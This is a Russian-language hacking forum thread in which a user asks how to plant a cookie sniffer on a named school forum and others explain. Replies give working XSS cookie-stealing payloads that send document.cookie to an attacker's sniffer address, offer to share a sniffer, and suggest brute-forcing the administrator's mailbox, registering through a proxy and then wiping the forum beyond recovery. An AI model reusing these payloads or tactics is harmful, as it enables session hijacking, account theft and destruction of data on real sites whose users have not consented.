|
вопрос.....не знаю в какую еще тему сунуть
на античате.ру есть возможность создать сниффер....у меня вопрос: када я его создаю в графе картинка что нада писать? и как потом заливать сниффер на скажем форум что бы он корректно работал и выдовал мне пакеты пользователей прочитавших страницу с этим сниффером или непосредственно перешедшим на этот сниффер если на него нада переходить?? :confused:
с уважением, психанутый доктор. З.Ы. вникал где-то часа 2 так и не понял что туда нада сунуть, по идее урл на картинку, но почему-то не сработало.....разъясните пожалуйста, желательно на пальцах чтоб дошло точно и с первого раза, не смотря на то что я довольно опытен в работе со сниферами (на сайте просто он халявный и судя по всему оч хороший должен быть) да и со взломом вообще, хочу просто этот метод опроьовать.....буду бесконечно признателен за помощь ;) еще раз с уважением |
Чтобы сниффер работал, его нужно засовывать в XSS, а про то, что такое XSS, можно прочитать на _http://www.google.com
|
я читал принцип работы сниффера......там нет решения моей проблемы....щас я хочу понять что нужно писать в графе "Картинка" на сайте античатюру в разделе сниффер.....что такое хсс я знаю.....мне нужно знать как залить сниффер в данном случае через античат
|
"Залить" жаваскриптовой командой <script>document.location="снифер"+document. cookie</script>
а на ачате щас вроде нельзя зарегать снифер |
Залить снифер? Хм... =)
Снифер он только перехватывает данные, ты его никуда не заливаешь. Но чтобы он перехватывал данные, его нужно уметь внедрить. Короче находишь CSS и вместо слова alert() пишешь img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document .cookie; вот и все. ЗЫ если срочняк нужен снифер, а он не регится, пиши в ПМ, поделюсь своим, ибо его какой-то дебил заюзал... Короче можно сказать, убили мой снифер =) |
Fr-Ron, уязвимость называеца XSS :)
Автор читай мой первый ответ...БЛ***!! |
блин....а где найти css на school1304.2bb.ru (движок как и на mybb)
|
хорошо...а как его залить в XSS? на том же форуме? я являюсь тока пользователем и не могу скрипты менять, а соответсвено я могу тока втыкать картинки и ссылки типа нажи "сюда" и перейдет на сайт командами [img]блаблабла[/img] где блаблабла есть урл картинки и [url=блаблабла[/url] где блаблабла собственно адрес сайта? как тада заливать?
|
2 Fr-Ron:
можешь мне сказать ссылку на этот "убитый" сниффер на icq: 271106568 плз? |
Цитата:
crazydoctor Ууу... Перед mybb потренировался бы получше =) Там баги на лету латают... Добавил : зачастую проще пробрутить мыльник админский и выслать на него пасс... Только вот забыл я уже где этот мыльник искать, ща попробую найти... Если найду, отпишусь... ... Еще раз добавил... Че-то не вижу я больше этой фичи... Когда-то на 3бб когда баги искал, было ясно написано "e-mail администратора бла-бла-бла". В конце концов можно у админа и спросить. Но тогда нужно бы не спалиться... Ну там, зарегься через проксю, получи мэйл, вскрой, а потом снеси там все без возможности восстановления =)) |
| Время: 15:10 |